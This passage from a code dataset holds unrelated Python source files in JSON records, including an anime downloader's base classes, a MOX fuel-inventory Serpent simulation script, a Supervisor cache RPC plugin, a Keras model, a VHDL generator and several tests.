request_scheme=scheme,\n request_host=f.request.pretty_host if hostheader else f.request.host,\n request_path=f.request.path,\n request_url=f.request.pretty_url if hostheader else f.request.url,\n request_http_version=f.request.http_version,\n request_timestamp=f.request.timestamp_start,\n request_is_push_promise='h2-pushed-stream' in f.metadata,\n intercepted=intercepted,\n response_code=response_code,\n response_reason=response_reason,\n response_content_length=response_content_length,\n response_content_type=response_content_type,\n duration=duration,\n error_message=error_message,\n )\n\n else:\n raise NotImplementedError()\n"} {"ext": "py", "sha": "1a3006a452cdbbb51f2df48ae8cc8d6376c541f9", "content": "\"\"\"\nanime.py contains the base classes required for other anime classes.\n\"\"\"\nimport os\nimport logging\nimport copy\nimport importlib\n\nfrom anime_downloader.sites.exceptions import AnimeDLError, NotFoundError\nfrom anime_downloader import util\nfrom anime_downloader.config import Config\nfrom anime_downloader.extractors import get_extractor\nfrom anime_downloader.downloader import get_downloader\n\nlogger = logging.getLogger(__name__)\n\n\nclass Anime:\n \"\"\"\n Base class for all anime classes.\n\n Parameters\n ----------\n url: string\n URL of the anime.\n quality: One of ['360p', '480p', '720p', '1080p']\n Quality of episodes\n fallback_qualities: list\n The order of fallback.\n\n Attributes\n ----------\n sitename: str\n name of the site\n title: str\n Title of the anime\n meta: dict\n metadata about the anime. [Can be empty]\n QUALITIES: list\n Possible qualities for the site\n \"\"\"\n sitename = ''\n title = ''\n meta = dict()\n subclasses = {}\n QUALITIES = ['360p', '480p', '720p', '1080p']\n\n @classmethod\n def search(cls, query):\n \"\"\"\n Search searches for the anime using the query given.\n\n Parameters\n ----------\n query: str\n query is the query keyword to be searched.\n\n Returns\n -------\n list\n List of :py:class:`~anime_downloader.sites.anime.SearchResult`\n \"\"\"\n return\n\n def __init__(self, url=None, quality='720p',\n fallback_qualities=None,\n _skip_online_data=False):\n self.url = url\n\n if fallback_qualities is None:\n fallback_qualities = ['720p', '480p', '360p']\n\n self._fallback_qualities = [\n q for q in fallback_qualities if q in self.QUALITIES]\n\n if quality in self.QUALITIES:\n self.quality = quality\n else:\n raise AnimeDLError(\n 'Quality {0} not found in {1}'.format(quality, self.QUALITIES))\n\n if not _skip_online_data:\n logger.info('Extracting episode info from page')\n self._episode_urls = self.get_data()\n self._len = len(self._episode_urls)\n\n @classmethod\n def verify_url(cls, url):\n if cls.sitename in url:\n return True\n return False\n\n @property\n def config(self):\n return Config['siteconfig'][self.sitename]\n\n def __init_subclass__(cls, sitename, **kwargs):\n super().__init_subclass__(**kwargs)\n cls.subclasses[sitename] = cls\n\n @classmethod\n def factory(cls, sitename: str):\n \"\"\"\n factory returns the appropriate subclass for the given site name.\n\n Parameters\n ----------\n sitename: str\n sitename is the name of the site\n\n Returns\n -------\n subclass of :py:class:`Anime`\n Sub class of :py:class:`Anime`\n \"\"\"\n return cls.subclasses[sitename]\n\n @classmethod\n def new_anime(cls, sitename: str):\n \"\"\"\n new_anime is a factory which returns the anime class corresposing to\n `sitename`\n\n Returns\n -------\n subclass of Anime\n \"\"\"\n module = importlib.import_module(\n 'anime_downloader.sites.{}'.format(sitename)\n )\n for c in dir(module):\n if issubclass(c, cls):\n return c\n raise ImportError(\"Cannot find subclass of {}\".format(cls))\n\n def get_data(self):\n \"\"\"\n get_data is called inside the :code:`__init__` of\n :py:class:`~anime_downloader.sites.anime.BaseAnime`. It is used to get\n the necessary data about the anime and it's episodes.\n\n This function calls\n :py:class:`~anime_downloader.sites.anime.BaseAnime._scarpe_episodes`\n and\n :py:class:`~anime_downloader.sites.anime.BaseAnime._scrape_metadata`\n\n TODO: Refactor this so that classes which need not be soupified don't\n have to overload this function.\n\n Returns\n -------\n list\n A list of tuples of episodes containing episode name and\n episode url.\n Ex::\n [('1', 'https://9anime.is/.../...', ...)]\n\n \"\"\"\n self._episode_urls = []\n try:\n self._scrape_metadata()\n except Exception as e:\n logger.debug('Metadata scraping error: {}'.format(e))\n\n self._episode_urls = self._scrape_episodes()\n self._len = len(self._episode_urls)\n\n logger.debug('EPISODE IDS: length: {}, ids: {}'.format(\n self._len, self._episode_urls))\n\n if not isinstance(self._episode_urls[0], tuple):\n self._episode_urls = [(no+1, id) for no, id in\n enumerate(self._episode_urls)]\n\n return self._episode_urls\n\n def __getitem__(self, index):\n episode_class = AnimeEpisode.subclasses[self.sitename]\n if isinstance(index, int):\n try:\n ep_id = self._episode_urls[index]\n except IndexError as e:\n raise RuntimeError(\"No episode found with index\") from e\n return episode_class(ep_id[1], parent=self,\n ep_no=ep_id[0])\n elif isinstance(index, slice):\n anime = copy.deepcopy(self)\n try:\n anime._episode_urls = anime._episode_urls[index]\n except IndexError as e:\n raise RuntimeError(\"No episode found with index\") from e\n return anime\n return None\n\n def __iter__(self):\n episode_class = AnimeEpisode.subclasses[self.sitename]\n for ep_id in self._episode_urls:\n yield episode_class(ep_id[1], parent=self, ep_no=ep_id[0])\n\n def __repr__(self):\n return '''\nSite: {name}\nAnime: {title}\nEpisode count: {length}\n'''.format(name=self.sitename, title=self.title, length=len(self))\n\n def __len__(self):\n return self._len\n\n def __str__(self):\n return self.title\n\n def _scarpe_episodes(self):\n \"\"\"\n _scarpe_episodes is function which has to be overridden by the base\n classes to scrape the episode urls from the web page.\n\n Parameters\n ----------\n soup: `bs4.BeautifulSoup`\n soup is the html of the anime url after passing through\n BeautifulSoup.\n\n Returns\n -------\n :code:`list` of :code:`str`\n A list of episode urls.\n \"\"\"\n return\n\n def _scrape_metadata(self):\n \"\"\"\n _scrape_metadata is function which has to be overridden by the base\n classes to scrape the metadata of anime from the web page.\n\n Parameters\n ----------\n soup: :py:class:`bs4.BeautifulSoup`\n soup is the html of the anime url after passing through\n BeautifulSoup.\n \"\"\"\n return\n\n\nclass AnimeEpisode:\n \"\"\"\n Base class for all Episode classes.\n\n Parameters\n ----------\n url: string\n URL of the episode.\n quality: One of ['360p', '480p', '720p', '1080p']\n Quality of episode\n fallback_qualities: list\n The order of fallback.\n\n Attributes\n ----------\n sitename: str\n name of the site\n title: str\n Title of the anime\n meta: dict\n metadata about the anime. [Can be empty]\n ep_no: string\n Episode number/title of the episode\n pretty_title: string\n Pretty title of episode in format -\n \"\"\"\n QUALITIES = []\n title = ''\n stream_url = ''\n subclasses = {}\n\n def __init__(self, url, parent: Anime = None, ep_no=None):\n\n self.ep_no = ep_no\n self.url = url\n self.quality = parent.quality\n self.QUALITIES = parent.QUALITIES\n self._parent = parent\n self._sources = None\n self.pretty_title = '{}-{}'.format(self._parent.title, self.ep_no)\n\n logger.debug(\"Extracting stream info of id: {}\".format(self.url))\n\n def try_data():\n self.get_data()\n # Just to verify the source is acquired\n self.source().stream_url\n try:\n try_data()\n except NotFoundError:\n # Issue #28\n qualities = copy.copy(self._parent._fallback_qualities)\n try:\n qualities.remove(self.quality)\n except ValueError:\n pass\n for quality in qualities:\n logger.warning('Quality {} not found. Trying {}.'.format(\n self.quality, quality))\n self.quality = quality\n try:\n try_data()\n return\n except NotFoundError:\n pass\n logger.warning(f'Skipping episode: {self.ep_no}')\n\n def __init_subclass__(cls, sitename: str, **kwargs):\n super().__init_subclass__(**kwargs)\n cls.subclasses[sitename] = cls\n cls.sitename = sitename\n\n @classmethod\n def factory(cls, sitename: str):\n return cls.subclasses[sitename]\n\n @property\n def config(self):\n return Config['siteconfig'][self.sitename]\n\n def source(self, index=0):\n \"\"\"\n Get the source for episode\n\n Returns\n -------\n `anime_downloader.extractors.base_extractor.BaseExtractor`\n Extractor depending on the source.\n \"\"\"\n if not self._sources:\n self.get_data()\n try:\n sitename, url = self._sources[index]\n except TypeError:\n return self._sources[index]\n except IndexError:\n raise NotFoundError(\"No episode sources found.\")\n\n ext = get_extractor(sitename)(url, quality=self.quality)\n self._sources[index] = ext\n\n return ext\n\n def get_data(self):\n self._sources = self._get_sources()\n logger.debug('Sources : {}'.format(self._sources))\n\n def _get_sources(self):\n raise NotImplementedError\n\n\n def sort_sources(self, data):\n \"\"\"\n Formatted data should look something like this\n \n [\n {'extractor': 'mp4upload', 'url': 'https://twist.moe/mp4upload/...', 'server': 'mp4upload', 'version': 'subbed'}, \n {'extractor': 'vidstream', 'url': 'https://twist.moe/vidstream/...', 'server': 'vidstream', 'version': 'dubbed'},\n {'extractor': 'no_extractor', 'url': 'https://twist.moe/anime/...', 'server': 'default', 'version': 'subbed'}\n ]\n\n extractor = the extractor the link should be passed to\n url = url to be passed to the extractor\n server = the server name used in config\n version = subbed/dubbed\n\n The config should consist of a list with servers in preferred order and a preferred language, eg\n \n \"servers\":[\"vidstream\",\"default\",\"mp4upload\"],\n \"version\":\"subbed\"\n\n Using the example above, this function will return: [('no_extractor', 'https://twist.moe/anime/...')]\n as it prioritizes preferred language over preferred server\n \"\"\"\n\n version = self.config.get('version','subbed') #TODO add a flag for this\n servers = self.config.get('servers',[''])\n\n logger.debug('Data : {}'.format(data))\n\n #Sorts the dicts by preferred server in config\n sorted_by_server = sorted(data, key=lambda x: servers.index(x['server']) if x['server'] in servers else len(data))\n\n #Sorts the above by preferred language \n #resulting in a list with the dicts sorted by language and server\n #with language being prioritized over server\n sorted_by_lang = list(sorted(sorted_by_server, key=lambda x: x['version'] == version, reverse=True))\n logger.debug('Sorted sources : {}'.format(sorted_by_lang))\n\n return '' if not sorted_by_lang else [(sorted_by_lang[0]['extractor'],sorted_by_lang[0]['url'])]\n\n\n def download(self, force=False, path=None,\n format='{anime_title}_{ep_no}', range_size=None):\n \"\"\"\n Downloads episode. This might be removed in a future release.\n\n Parameters\n ----------\n force: bool\n Whether to force download or not.\n path: string\n Path to the directory/file where the file should be downloaded to.\n format: string\n The format of the filename if not provided.\n \"\"\"\n # TODO: Remove this shit\n logger.info('Downloading {}'.format(self.pretty_title))\n if format:\n file_name = util.format_filename(format, self)+'.mp4'\n\n if path is None:\n path = './' + file_name\n if path.endswith('.mp4'):\n path = path\n else:\n path = os.path.join(path, file_name)\n\n Downloader = get_downloader('http')\n downloader = Downloader(self.source(),\n path, force, range_size=range_size)\n\n downloader.download()\n\n\nclass SearchResult:\n \"\"\"\n SearchResult class holds the search result of a search done by an Anime\n class\n\n Parameters\n ----------\n title: str\n Title of the anime.\n url: str\n URL of the anime\n poster: str\n URL for the poster of the anime.\n meta: dict\n Additional metadata regarding the anime.\n\n Attributes\n ----------\n title: str\n Title of the anime.\n url: str\n URL of the anime\n poster: str\n URL for the poster of the anime.\n meta: dict\n Additional metadata regarding the anime.\n meta_info: dict\n Metadata regarding the anime. Not shown in the results, used to match with MAL\n \"\"\"\n\n def __init__(self, title, url, poster='', meta='', meta_info={}):\n self.title = title\n self.url = url\n self.poster = poster\n self.meta = meta\n self.meta_info = meta_info\n\n def __repr__(self):\n return ''.format(self.title, self.url)\n\n def __str__(self):\n return self.title\n\n @property\n def pretty_metadata(self):\n \"\"\"\n pretty_metadata is the prettified version of metadata\n \"\"\"\n if self.meta:\n return ' | '.join(val for _, val in self.meta.items())\n return ''\n"} {"ext": "py", "sha": "1a30072634fc39f2566f9e3473f156264b3066c5", "content": "import sys\n\nfrom fastapi import FastAPI, Request\n\nfrom .exceptions import CustomHTTPException\nfrom .routers import oauth, webhooks\n\nif sys.version_info[1] < 7:\n from backports.datetime_fromisoformat import MonkeyPatch\n\n MonkeyPatch.patch_fromisoformat()\n\n\napp = FastAPI()\n\n\n@app.exception_handler(CustomHTTPException)\ndef custom_http_exception_handler(request: Request, exc: CustomHTTPException):\n return exc.response\n\n\napp.include_router(oauth.router)\napp.include_router(webhooks.router)\n"} {"ext": "py", "sha": "1a3007316afbaf0d3b0079fa8d10af149bcb31c9", "content": "#Copyright ReportLab Europe Ltd. 2000-2017\n#see license.txt for license details\n#history https://hg.reportlab.com/hg-public/reportlab/log/tip/tools/pythonpoint/styles/__init__.py\n"} {"ext": "py", "sha": "1a30089d53a86042c21b7f2f23c1e8e4be3f6cb1", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nFuel inventory library (UOX)\n\nScript to run computations. It will produce a set of folders and outputfiles\nand a csv file storing linking the output file paths to the BU, CT, IE values.\n\nzsolt elter 2019\n\"\"\"\nimport numpy as np\nimport os\nimport math\n#import pandas as pd\n#from PDfunctions import *\ndef fuelinput(wp):\n \"\"\"\n function to calculate the weight percentage of MOX nuclides\n \n formulae from http://holbert.faculty.asu.edu/eee460/NumberDensity.pdf\n \n Parameters\n ----------\n wp : float\n Plutonium content in percentage\n \n Returns\n -------\n fuelstr : str\n Serpent formatted material composition\n \n Notes\n -----\n 1, Right now the temperature is hard coded (ie ZAID ends with '.15c'), this can be modified.\n 2, Right now the density of fuel is hard coded, this can be modified\n 3, The fuel string includes Cf nuclides with 0.0w%. This is to force Serpent2 to include these\n nuclides. The reason to include them because they might be relevant in subsequent neutron coincidence\n based calculations.\n \"\"\"\n u=1000*1.660539040e-27 #g\n NA=6.0221409e23 ##/mol\n M={'U235': 235.0439299*u*NA,\n 'U234': 234.0409521*u*NA,\n 'U238': 238.05078826*u*NA,\n 'Pu238': 238.0495599*u*NA,\n 'Pu239': 239.0521634*u*NA,\n 'Pu240': 240.0538135*u*NA,\n 'Pu241': 241.0568515*u*NA,\n 'Pu242': 242.0587426*u*NA}\n \n Puvec={'Pu238':2.5/100,'Pu239':54.7/100,'Pu240':26.1/100,'Pu241':9.5/100,'Pu242':7.2/100}\n Uvec={'U234':0.0012/100,'U235':0.25/100,'U238':99.7488/100} #czsolti 0.00119 rounded to get 1\n MO16= 15.99491461956*u*NA\n rhoMOX=10.5 #g/cm3 czsolti this density falls out from the equations\n \n wp=wp/100\n \n MU=1/sum([Uvec[iso]/M[iso] for iso in Uvec])\n MPu=1/sum([Puvec[iso]/M[iso] for iso in Puvec])\n\n MHM=(1-wp)*MU+wp*MPu\n MMOX=MHM+2*MO16\n \n \n rhoHM=rhoMOX*(MHM/MMOX)\n rhoO=rhoMOX*(MO16/MMOX)\n \n MVOL={}\n for iso in Uvec:\n MVOL[iso] = (1-wp)*Uvec[iso]*rhoHM\n for iso in Puvec:\n MVOL[iso] = wp*Puvec[iso]*rhoHM\n \n M_O16=(rhoO*2)\n M_TOT=sum(MVOL.values())+M_O16\n\n fuelstr='mat MOX -10.5 burn 1'\n fuelstr=fuelstr+'\\n 92234.15c -%.8f'%(MVOL['U234']/M_TOT)\n fuelstr=fuelstr+'\\n 92235.15c -%.8f'%(MVOL['U235']/M_TOT)\n fuelstr=fuelstr+'\\n 92238.15c -%.8f'%(MVOL['U238']/M_TOT)\n fuelstr=fuelstr+'\\n 94238.15c -%.8f'%(MVOL['Pu238']/M_TOT)\n fuelstr=fuelstr+'\\n 94239.15c -%.8f'%(MVOL['Pu239']/M_TOT)\n fuelstr=fuelstr+'\\n 94240.15c -%.8f'%(MVOL['Pu240']/M_TOT)\n fuelstr=fuelstr+'\\n 94241.15c -%.8f'%(MVOL['Pu241']/M_TOT)\n fuelstr=fuelstr+'\\n 94242.15c -%.8f'%(MVOL['Pu242']/M_TOT)\n fuelstr=fuelstr+'\\n 8016.15c -%.8f'%(M_O16/M_TOT)\n fuelstr=fuelstr+'\\n 98249.15c -0.0'\n fuelstr=fuelstr+'\\n 98250.15c -0.0'\n fuelstr=fuelstr+'\\n 98251.15c -0.0'\n fuelstr=fuelstr+'\\n 98252.15c -0.0'\n fuelstr=fuelstr+'\\n 98253.15c -0.0'\n fuelstr=fuelstr+'\\n 98254.15c -0.0'\n return fuelstr\n\n### SCRIPT to run\n\n###Init array for CTs-> can be modified if other CT values are preferred.\nCT=0\nCTs=[0]\ndecstep=[]\nwhile CT<70*365:\n if CT<10*365:\n decstep.append(91.25)\n CT=CT+91.25\n CTs.append(CT)\n elif CT<40*365:\n decstep.append(2*91.25)\n CT=CT+2*91.25\n CTs.append(CT)\n else:\n decstep.append(4*91.25)\n CT=CT+4*91.25\n CTs.append(CT)\n\n#csv header\ncsvstr=',BU,CT,IE,fuelType,reactorType,serpent\\n'\n\n#path to be updated\npath=os.getcwd()+'/'\ndataFrame='fuellog_strategicPWR_MOX.csv'\ninputFileRun = open(dataFrame,'a')\ninputFileRun.write(csvstr)\ninputFileRun.close()\n\ninputFileBU = open('MOX_manyBU')\ninputFileBURefStr = inputFileBU.read()\ninputFileBU.close()\n\ninputFileCT = open('MOX_manyCT')\ninputFileCTRefStr = inputFileCT.read()\ninputFileCT.close()\n\nIE=np.linspace(4,10,31)\nidfuel=0\nfor ie in IE:\n fstr=fuelinput(ie)\n inputFileBUStr = inputFileBURefStr\n inputFileBUStr = inputFileBUStr.replace('fuelstr', fstr)\n \n sfile='sPWR_MOX_IE_%d'%(ie*10)\n os.chdir(path+'serpent_files/')\n os.system('mkdir IE%d'%(ie*10))\n os.chdir(path+'serpent_files/IE%d/'%(ie*10))\n inputFileRun = open(sfile,'w')\n inputFileRun.write(inputFileBUStr)\n inputFileRun.close()\n \n #pathV=path+'serpent_filesPWR_BIC/'\n #os.system('ssh '+node+' \"nice sss2 '+pathV+sfile+' -omp 64\"')\n os.system('nice sss2 '+sfile+' -omp 64')\n \n bu=5.0\n for bui in range(10,147): #5-70 MWd/kgU\n if bui not in [0,21,42,63,84,105,126]:#downtime\n os.chdir(path+'serpent_files/IE%d/'%(ie*10))\n spentmat = open(sfile+'.bumat'+str(bui)).read()\n spentmat=spentmat.replace('MOXp1r1','MOX')\n spentmat=spentmat.replace('\\n 1001.15c',' burn 1\\n 1001.15c')\n \n inputFileCTStr = inputFileCTRefStr\n inputFileCTStr = inputFileCTStr.replace('matstr', spentmat)\n \n sfilect='sPWR_MOX_IE_%d_BU_%d'%(ie*10,bu*10)\n \n os.system('mkdir BU%d'%(bu*10))\n os.chdir(path+'serpent_files/IE%d/BU%d/'%(ie*10,bu*10))\n inputFileRun = open(sfilect,'w')\n inputFileRun.write(inputFileCTStr)\n inputFileRun.close()\n os.system('nice sss2 '+sfilect+' -omp 64')\n for cti in range(131):\n filepath=path+'serpent_files/IE%d/BU%d/'%(ie*10,bu*10)+sfilect+'.bumat'+str(cti) \n \n csvstr='%d,%.2f,%.2f,%.2f,MOX,PWR,%s\\n'%(idfuel,bu,CTs[cti],ie,filepath)\n idfuel=idfuel+1\n os.chdir(path)\n inputFileRun = open(dataFrame,'a')\n inputFileRun.write(csvstr)\n inputFileRun.close()\n bu=bu+0.5\n"} {"ext": "py", "sha": "1a3008c9e3f698609041dc42ffb29cb03f4606e6", "content": "from supervisor.supervisord import SupervisorStates\nfrom supervisor.xmlrpc import Faults\nfrom supervisor.xmlrpc import RPCError\n\nAPI_VERSION = '0.2'\n\nclass CacheNamespaceRPCInterface:\n \"\"\" A Supervisor RPC interface that provides the ability\n to cache abritrary data in the Supervisor instance as key/value pairs.\n \"\"\"\n\n def __init__(self, supervisord):\n self.supervisord = supervisord\n self.cache = {}\n\n def _update(self, text):\n self.update_text = text # for unit tests, mainly\n\n state = self.supervisord.get_state()\n\n if state == SupervisorStates.SHUTDOWN:\n raise RPCError(Faults.SHUTDOWN_STATE)\n\n # XXX fatal state\n\n # RPC API methods\n\n def getAPIVersion(self):\n \"\"\" Return the version of the RPC API used by supervisor_cache\n\n @return string version\n \"\"\"\n self._update('getAPIVersion')\n return API_VERSION\n\n def getKeys(self):\n \"\"\" Return keys for all data stored in the cache\n\n @return array An array of strings representing cache keys\n \"\"\"\n self._update('getKeys')\n return sorted(self.cache.keys())\n\n def getCount(self):\n \"\"\" Return a count of all items in the cache\n\n @return integer Count of items\n \"\"\"\n self._update('getCount')\n return len(self.cache)\n\n def store(self, key, data):\n \"\"\" Store a string value in the cache, referenced by 'key'\n\n @param string key A string to use as a cache key\n @param string data A string for cache value\n @return boolean Always true unless error\n \"\"\"\n self._update('store')\n self._validateKey(key)\n\n # XMLRPC can handle non-string values\n #if not isinstance(data, str):\n # why = 'Cache data must be a string'\n # raise RPCError(Faults.INCORRECT_PARAMETERS, why)\n\n self.cache[key] = data\n return True\n\n def fetch(self, key):\n \"\"\" Retrieve data from cache stored under 'key'\n\n @param string key The cache key\n @return string Cache data stored at key\n \"\"\"\n self._update('fetch')\n self._validateKey(key)\n\n data = self.cache.get(key)\n if data is None:\n raise RPCError(Faults.BAD_NAME)\n return data\n\n def delete(self, key):\n \"\"\" Delete data stored in cache under 'key'\n\n @param string key The key to delete from the cache\n @return boolean Always true unless error.\n \"\"\"\n self._update('delete')\n self._validateKey(key)\n\n if key in self.cache:\n del self.cache[key]\n return True\n\n def clear(self):\n \"\"\" Clear the cache\n\n @return boolean Always true unless error.\n \"\"\"\n self._update('clear')\n self.cache.clear()\n return True\n\n def _validateKey(self, key):\n \"\"\" validate 'key' is suitable for a cache key name \"\"\"\n if not isinstance(key, str) or (key == ''):\n why = 'Cache key must be a non-empty string'\n raise RPCError(Faults.BAD_NAME, why)\n\ndef make_cache_rpcinterface(supervisord, **config):\n return CacheNamespaceRPCInterface(supervisord)\n"} {"ext": "py", "sha": "1a30099984527719ff6921cc308643f970eddd4e", "content": "from tensorflow.keras import layers, models, datasets, optimizers\nimport numpy as np\n\ndef neural_network_spatial():\n input_ = layers.Input(shape=(32,32,3))\n cnn = layers.Conv2D(16, (3,3), activation=\"relu\") (input_)\n cnn = layers.SpatialDropout2D(0.2) (cnn)\n cnn = layers.MaxPooling2D() (cnn)\n \n cnn = layers.Conv2D(32, (3,3), activation=\"relu\") (cnn)\n cnn = layers.SpatialDropout2D(0.5) (cnn)\n cnn = layers.MaxPooling2D() (cnn)\n \n flatten = layers.GlobalMaxPooling2D() (cnn)\n \n dense = layers.Dense(32, activation=\"relu\") (flatten)\n dense = layers.Dropout(0.5) (dense)\n dense = layers.Dense(16, activation=\"relu\") (dense)\n \n output = layers.Dense(10, activation=\"softmax\") (dense)\n \n opt = optimizers.Adam()\n \n m= models.Model(input_, output)\n m.compile(optimizer=opt,\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n \n return m\nmodel = neural_network_spatial() # get model\nprint(model.summary())"} {"ext": "py", "sha": "1a3009b35f5b8355caff0b51ec67834425032174", "content": "import coloredlogs\nimport logging\nimport os\n\nlogging.basicConfig(\n filename=\"plex_doctor.log\",\n level=logging.DEBUG,\n format='%(levelname)s: \"%(asctime)s - %(message)s',\n)\n\nlog = logging.getLogger(\"PLEX-DOCTOR\")\nlog.setLevel(logging.DEBUG)\n\nLOGLEVEL = os.environ.get(\"LOGLEVEL\", \"INFO\").upper()\nstream_handler = logging.StreamHandler()\nstream_handler.setFormatter(\n logging.Formatter('%(levelname)s: \"%(asctime)s - %(message)s')\n)\n\nlog.addHandler(stream_handler)\n\ncoloredlogs.install(LOGLEVEL, logger=log)"} {"ext": "py", "sha": "1a300a2a94c36098cc627f24f1e9f76a0c5cef6a", "content": "#!/usr/bin/env python\n\"\"\"VHDL generation of unary operators\"\"\"\n\nimport common\n\n__author__ = \"Jon Dawson\"\n__copyright__ = \"Copyright 2010, Jonathan P Dawson\"\n__license__ = \"MIT\"\n__version__ = \"0.1.3\"\n__maintainer__ = \"Jon Dawson\"\n__email__ = \"chips@jondawson.org.uk\"\n__status__ = \"Prototype\"\n\ndef write(stream):\n\n identifier = stream.get_identifier()\n bits = stream.get_bits()\n identifier_a = stream.a.get_identifier()\n constant = stream.constant\n\n expressions = {\n 'srn' : \"STREAM_{0} <= SR( STREAM_{1}, {2})\",\n 'sln' : \"STREAM_{0} <= SL( STREAM_{1}, {2})\",\n 'abs' : \"STREAM_{0} <= ABSOLUTE(STREAM_{1})\",\n 'invert' : \"STREAM_{0} <= not STREAM_{1}\",\n 'not' : \"STREAM_{0} <= LNOT(STREAM_{1})\",\n }\n\n expression = expressions[stream.function].format(identifier, identifier_a, common.binary(constant, bits))\n expression = \" {0};\".format(expression)\n\n ports = [\n ]\n\n declarations = [\n \" signal STATE_{0} : BINARY_STATE_TYPE;\".format(identifier),\n \" signal STREAM_{0} : std_logic_vector({1} downto 0);\".format(identifier, bits - 1),\n \" signal STREAM_{0}_STB : std_logic;\".format(identifier),\n \" signal STREAM_{0}_ACK : std_logic;\".format(identifier),\n \"\",\n ]\n\n definitions = [\n \" --file: {0}, line: {1}\".format(stream.filename, stream.lineno),\n \" --STREAM {0} Unary({1}, {2}, '{3}')\".format(identifier, identifier_a, constant, stream.function),\n \" process\",\n \" begin\",\n \" wait until rising_edge(CLK);\",\n \" case STATE_{0} is\".format(identifier),\n \" when BINARY_INPUT =>\",\n \" if STREAM_{0}_STB = '1' then\".format(identifier_a),\n \" STREAM_{0}_ACK <= '1';\".format(identifier_a),\n expression,\n \" STREAM_{0}_STB <= '1';\".format(identifier),\n \" STATE_{0} <= BINARY_OUTPUT;\".format(identifier),\n \" end if;\",\n \" when BINARY_OUTPUT =>\",\n \" STREAM_{0}_ACK <= '0';\".format(identifier_a),\n \" if STREAM_{0}_ACK = '1' then\".format(identifier),\n \" STREAM_{0}_STB <= '0';\".format(identifier),\n \" STATE_{0} <= BINARY_INPUT;\".format(identifier),\n \" end if;\",\n \" end case;\",\n \" if RST = '1' then\",\n \" STREAM_{0}_STB <= '0';\".format(identifier),\n \" STREAM_{0}_ACK <= '0';\".format(identifier_a),\n \" STATE_{0} <= BINARY_INPUT;\".format(identifier),\n \" end if;\",\n \" end process;\",\n \"\",\n ]\n\n return ports, declarations, definitions\n"} {"ext": "py", "sha": "1a300c2dc35aa09e1cd804c7e387dc31876d8779", "content": "from arm.logicnode.arm_nodes import *\n\nclass OnContactArrayNode(ArmLogicTreeNode):\n \"\"\"Activates the output when the given rigid body make contact with other given rigid bodies.\"\"\"\n bl_idname = 'LNOnContactArrayNode'\n bl_label = 'On Contact Array'\n arm_section = 'contact'\n arm_version = 1\n\n property0: EnumProperty(\n items = [('begin', 'Begin', 'The contact between the rigid bodies begins'),\n ('overlap', 'Overlap', 'The contact between the rigid bodies is happening'),\n ('end', 'End', 'The contact between the rigid bodies ends')],\n name='', default='begin')\n\n def init(self, context):\n super(OnContactArrayNode, self).init(context)\n self.add_input('ArmNodeSocketObject', 'RB')\n self.add_input('ArmNodeSocketArray', 'RBs')\n\n self.add_output('ArmNodeSocketAction', 'Out')\n\n def draw_buttons(self, context, layout):\n layout.prop(self, 'property0')\n"} {"ext": "py", "sha": "1a300c6d0dabf14e31123f23b2e574db609135a8", "content": "#!/usr/bin/env python\n\nfrom load import ROOT as R\nfrom gna.unittest import *\nfrom gna.env import env\nimport gna.constructors as C\nimport numpy as N\nfrom gna import context\nimport gna.bindings.arrayview\n\n@floatcopy(globals(), True)\ndef test_vararray_preallocated_v01(function_name):\n ns = env.globalns(function_name)\n\n names = [ 'zero', 'one', 'two', 'three', 'four', 'five' ]\n values = N.arange(len(names), dtype=context.current_precision_short())\n variables = R.vector('variable<%s>'%context.current_precision())()\n\n with context.allocator(100) as allocator:\n for name, value in zip(names, values):\n par = ns.defparameter(name, central=value, relsigma=0.1)\n variables.push_back(par.getVariable())\n\n with ns:\n vsum = C.VarSum(names, 'sum', ns=ns)\n vsum_var=ns['sum'].get()\n variables.push_back(vsum_var.getVariable())\n vprod = C.VarProduct(names, 'product', ns=ns)\n vprod_var=ns['product'].get()\n variables.push_back(vprod_var.getVariable())\n\n va = C.VarArrayPreallocated(variables)\n\n pool=allocator.view()\n res=va.vararray.points.data()\n\n values_all = N.zeros(shape=values.size+2, dtype=values.dtype)\n values_all[:-2]=values\n values_all[-2]=values_all[:-2].sum()\n values_all[-1]=values_all[:-2].prod()\n\n print('Python array:', values_all)\n print('VarArray (preallocated):', res)\n print('Pool:', pool)\n\n assert (values_all==res).all()\n assert (values_all==pool).all()\n assert (res==pool).all()\n\n for i, (val, name) in enumerate(enumerate(names, 2)):\n ns[name].set(val)\n values_all[i]=val\n values_all[-2]=values_all[:-2].sum()\n values_all[-1]=values_all[:-2].prod()\n res=va.vararray.points.data()\n\n print('Iteration', i)\n print(' Python array:', values_all)\n print(' VarArray (preallocated):', res)\n\n assert (values_all==res).all()\n assert (values_all==pool).all()\n assert (res==pool).all()\n\nif __name__ == '__main__':\n run_unittests(globals())\n"} {"ext": "py", "sha": "1a300ce0d6ee0b9f711e5b7905619ea8718207cf", "content": "import json\nimport datetime\nfrom pyld import jsonld\n\nfrom core.testing import DatabaseTest\nfrom core.util.datetime_helpers import utc_now\nfrom .test_controller import ControllerTest\n\nfrom core.model import (\n Annotation,\n create,\n)\n\nfrom api.annotations import (\n AnnotationWriter,\n AnnotationParser,\n)\nfrom api.problem_details import *\n\nclass AnnotationTest(DatabaseTest):\n\n def _patron(self):\n \"\"\"Create a test patron who has opted in to annotation sync.\"\"\"\n patron = super(AnnotationTest, self)._patron()\n patron.synchronize_annotations = True\n return patron\n\n\nclass TestAnnotationWriter(AnnotationTest, ControllerTest):\n\n def test_annotations_for(self):\n patron = self._patron()\n\n # The patron doesn't have any annotations yet.\n assert [] == AnnotationWriter.annotations_for(patron)\n\n identifier = self._identifier()\n annotation, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier,\n motivation=Annotation.IDLING,\n )\n\n # The patron has one annotation.\n assert [annotation] == AnnotationWriter.annotations_for(patron)\n assert [annotation] == AnnotationWriter.annotations_for(patron, identifier)\n\n identifier2 = self._identifier()\n annotation2, ignore = create(\n self._db, Annotation,\n patron=patron,\n identifier=identifier2,\n motivation=Annotation.IDLING,\n )\n\n # The patron has two annotations for different identifiers.\n assert set([annotation, annotation2]) == set(AnnotationWriter.annotations_for(patron))\n assert [annotation] == AnnotationWriter.annotations_for(patron, identifier)\n assert [annotation2] == AnnotationWriter.annotations_for(patron, identifier2)\n\n def test_annotation_container_for(self):\n patron = self._patron()\n\n with self.app.test_request_context(\"/\"):\n container, timestamp = AnnotationWriter.annotation_container_for(patron)\n\n assert (set([AnnotationWriter.JSONLD_CONTEXT, AnnotationWriter.LDP_CONTEXT]) ==\n set(container['@context']))\n assert \"annotations\" in container[\"id\"]\n assert 